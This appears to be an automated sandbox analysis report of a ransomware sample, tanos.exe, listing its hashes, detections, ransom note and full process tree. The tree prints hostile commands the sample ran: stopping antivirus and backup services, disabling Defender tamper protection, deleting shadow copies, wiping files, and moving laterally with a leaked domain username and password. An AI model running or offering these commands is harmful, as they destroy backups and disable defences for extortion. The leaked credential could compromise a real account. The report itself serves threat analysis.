Analysis
-
max time kernel
943s -
max time network
946s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
17-05-2022 10:35
Static task
static1
Behavioral task
behavioral1
Sample
tanos.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
tanos.exe
Resource
win10v2004-20220414-en
General
-
Target
tanos.exe
-
Size
87KB
-
MD5
d6d956267a268c9dcf48445629d2803e
-
SHA1
cc0feae505dad9c140dd21d1b40b518d8e61b3a4
-
SHA256
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850
-
SHA512
e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/4720-130-0x0000000000F30000-0x0000000000F4C000-memory.dmp disable_win_def -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 21 1820 mshta.exe 22 1820 mshta.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 556 k0xherol.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\MergeJoin.tiff.crypted tanos.exe File opened for modification C:\Users\Admin\Pictures\MergeJoin.tiff tanos.exe File created C:\Users\Admin\Pictures\RepairResume.png.crypted tanos.exe File created C:\Users\Admin\Pictures\UnregisterStart.raw.crypted tanos.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation tanos.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk tanos.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" tanos.exe -
Enumerates connected drives 3 TTPs 14 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." tanos.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" tanos.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3264 vssadmin.exe 5032 vssadmin.exe 680 vssadmin.exe 3908 vssadmin.exe 5100 vssadmin.exe 1988 vssadmin.exe 1232 vssadmin.exe 4548 vssadmin.exe 224 vssadmin.exe 3168 vssadmin.exe 3864 vssadmin.exe 3576 vssadmin.exe 1396 vssadmin.exe 2752 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 2604 taskkill.exe 4672 taskkill.exe 3384 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4180 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4716 powershell.exe 4716 powershell.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 4720 tanos.exe Token: SeDebugPrivilege 4716 powershell.exe Token: SeDebugPrivilege 2604 taskkill.exe Token: SeDebugPrivilege 4672 taskkill.exe Token: SeDebugPrivilege 3384 taskkill.exe Token: SeBackupPrivilege 5924 vssvc.exe Token: SeRestorePrivilege 5924 vssvc.exe Token: SeAuditPrivilege 5924 vssvc.exe Token: SeAssignPrimaryTokenPrivilege 556 k0xherol.exe Token: SeIncreaseQuotaPrivilege 556 k0xherol.exe Token: SeImpersonatePrivilege 556 k0xherol.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4720 tanos.exe 4720 tanos.exe 4720 tanos.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4720 wrote to memory of 4716 4720 tanos.exe 84 PID 4720 wrote to memory of 4716 4720 tanos.exe 84 PID 4720 wrote to memory of 4240 4720 tanos.exe 86 PID 4720 wrote to memory of 4240 4720 tanos.exe 86 PID 4720 wrote to memory of 5092 4720 tanos.exe 87 PID 4720 wrote to memory of 5092 4720 tanos.exe 87 PID 4720 wrote to memory of 4976 4720 tanos.exe 90 PID 4720 wrote to memory of 4976 4720 tanos.exe 90 PID 4720 wrote to memory of 5036 4720 tanos.exe 91 PID 4720 wrote to memory of 5036 4720 tanos.exe 91 PID 4720 wrote to memory of 5060 4720 tanos.exe 94 PID 4720 wrote to memory of 5060 4720 tanos.exe 94 PID 4720 wrote to memory of 4924 4720 tanos.exe 106 PID 4720 wrote to memory of 4924 4720 tanos.exe 106 PID 4720 wrote to memory of 4776 4720 tanos.exe 105 PID 4720 wrote to memory of 4776 4720 tanos.exe 105 PID 4240 wrote to memory of 1420 4240 net.exe 96 PID 4240 wrote to memory of 1420 4240 net.exe 96 PID 4720 wrote to memory of 3188 4720 tanos.exe 103 PID 4720 wrote to memory of 3188 4720 tanos.exe 103 PID 4720 wrote to memory of 3220 4720 tanos.exe 98 PID 4720 wrote to memory of 3220 4720 tanos.exe 98 PID 4720 wrote to memory of 116 4720 tanos.exe 99 PID 4720 wrote to memory of 116 4720 tanos.exe 99 PID 5092 wrote to memory of 224 5092 net.exe 187 PID 5092 wrote to memory of 224 5092 net.exe 187 PID 4720 wrote to memory of 3832 4720 tanos.exe 107 PID 4720 wrote to memory of 3832 4720 tanos.exe 107 PID 4720 wrote to memory of 4072 4720 tanos.exe 108 PID 4720 wrote to memory of 4072 4720 tanos.exe 108 PID 4976 wrote to memory of 4480 4976 net.exe 177 PID 4976 wrote to memory of 4480 4976 net.exe 177 PID 4720 wrote to memory of 3720 4720 tanos.exe 110 PID 4720 wrote to memory of 3720 4720 tanos.exe 110 PID 5036 wrote to memory of 3512 5036 net.exe 113 PID 5036 wrote to memory of 3512 5036 net.exe 113 PID 5060 wrote to memory of 4580 5060 net.exe 240 PID 5060 wrote to memory of 4580 5060 net.exe 240 PID 4720 wrote to memory of 4612 4720 tanos.exe 239 PID 4720 wrote to memory of 4612 4720 tanos.exe 239 PID 4720 wrote to memory of 4088 4720 tanos.exe 237 PID 4720 wrote to memory of 4088 4720 tanos.exe 237 PID 4924 wrote to memory of 3476 4924 net.exe 236 PID 4924 wrote to memory of 3476 4924 net.exe 236 PID 4720 wrote to memory of 2208 4720 tanos.exe 234 PID 4720 wrote to memory of 2208 4720 tanos.exe 234 PID 4776 wrote to memory of 2964 4776 net.exe 114 PID 4776 wrote to memory of 2964 4776 net.exe 114 PID 4720 wrote to memory of 3468 4720 tanos.exe 115 PID 4720 wrote to memory of 3468 4720 tanos.exe 115 PID 3188 wrote to memory of 5020 3188 net.exe 232 PID 3188 wrote to memory of 5020 3188 net.exe 232 PID 3220 wrote to memory of 628 3220 net.exe 231 PID 3220 wrote to memory of 628 3220 net.exe 231 PID 4720 wrote to memory of 1040 4720 tanos.exe 230 PID 4720 wrote to memory of 1040 4720 tanos.exe 230 PID 4720 wrote to memory of 964 4720 tanos.exe 118 PID 4720 wrote to memory of 964 4720 tanos.exe 118 PID 116 wrote to memory of 2700 116 net.exe 229 PID 116 wrote to memory of 2700 116 net.exe 229 PID 4720 wrote to memory of 1836 4720 tanos.exe 227 PID 4720 wrote to memory of 1836 4720 tanos.exe 227 PID 4072 wrote to memory of 4432 4072 net.exe 226 PID 4072 wrote to memory of 4432 4072 net.exe 226
Processes
-
C:\Users\Admin\AppData\Local\Temp\tanos.exe"C:\Users\Admin\AppData\Local\Temp\tanos.exe"1⤵
- Modifies extensions of user files
- Checks computer location settings
- Drops startup file
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4716
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:1420
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:224
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:4480
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:3512
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:4580
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:628
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:2700
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:5020
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:2964
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:3476
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:3832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:2888
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:4432
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:3720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:956
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:3468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:3320
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:3844
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:3460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:4648
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:112
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:1744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:4952
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:1468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:996
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:4956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:4788
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:3976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:5296
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:4188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:5436
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:4488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:5424
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:5304
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.127.0.75 /USER:SHJPOLICE\amer !Omar20122⤵PID:6060
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:5096
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3864
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5032
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:680
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:3576
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1396
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:224
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1232
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4548
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2752
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3908
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5100
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1988
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3264
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3168
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:320
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:1612
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:4580
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:2896
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:5116
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:3716
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:3924
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:1448
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:2628
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:4892
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:4784
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:1836
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:1040
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:2208
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:4088
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:4612
-
-
C:\Users\Admin\AppData\Local\Temp\k0xherol.exe"C:\Users\Admin\AppData\Local\Temp\k0xherol.exe" \10.127.0.75 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\tanos.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:2464
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵
- Blocklisted process makes network request
PID:1820
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:3912
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:4180
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tanos.exe2⤵PID:1884
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4716
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:4576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵PID:1304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:4180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:4992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:1984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:5656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:5688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:5664
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5924
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:3048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵PID:368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵PID:4060
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
219KB
MD5b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2
-
Filesize
219KB
MD5b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2
-
Filesize
1KB
MD5c958eca58e649ad41137a5e190d26026
SHA16dd3f5aab997b0498ab474446113cd2d5a62264e
SHA25612df7f594dabb18bd394fb198b26e7044238abfe84fd0b29473ff4cb0d143324
SHA51264a2ad913dcda1b7b33026c54502bd143c67b548663bdcb00a6be7f49b555f11e6f03a5379f49308614f42dc045f33b3cfe46a0f5a9dce151c0b799532c0e5b7